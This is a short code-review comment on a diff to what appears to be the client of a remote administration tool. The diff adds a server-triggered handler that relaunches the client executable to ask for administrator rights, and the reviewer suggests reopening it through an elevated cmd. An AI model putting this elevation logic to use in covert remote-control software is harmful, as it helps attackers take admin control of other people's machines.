Client/Core/Commands/SystemHandler.cs

```diff
@@ -438,6 +439,35 @@ public static void HandleDoProcessKill(Packets.ServerPackets.DoProcessKill comma
             }
         }
 
+        public static void HandleAskElevate(Packets.ServerPackets.DoAskElevate command, Client client)
+        {
+            if (!(WindowsAccountHelper.GetAccountType() == "Admin"))
+            {
+                ProcessStartInfo proc = new ProcessStartInfo();
+                proc.UseShellExecute = true;
+                proc.WorkingDirectory = Environment.CurrentDirectory;
+                proc.FileName = Application.ExecutablePath;
```

Comment:
You can make the client open new cmd as admin and it will open the client again.